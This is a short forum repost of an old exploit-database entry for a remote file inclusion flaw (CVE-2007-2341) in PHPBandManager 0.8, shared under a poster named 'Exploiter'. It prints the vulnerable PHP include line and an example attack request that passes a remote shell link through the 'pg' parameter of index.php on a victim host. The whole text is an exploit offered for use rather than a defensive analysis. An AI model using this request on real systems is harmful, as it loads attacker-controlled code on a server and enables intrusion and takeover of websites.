Exploit PHPBandManager 0.8 - 'index.php?pg' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3802
Проверка EDB
  1. Пройдено
Автор
KORAY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-2341
Дата публикации
2007-04-26
Код:
author:koray
greetz:cigicigi.net
script:http://sourceforge.net/projects/phpbandmanager

allow_url_fopen:on or register_globals:on

vuln;

/bandmanager/suite/index.php

include($_GET['pg'].".php");

example;

http://www.victim.com/suite/index.php?pg=shell link?

# milw0rm.com [2007-04-26]
 
Источник
www.exploit-db.com

Похожие темы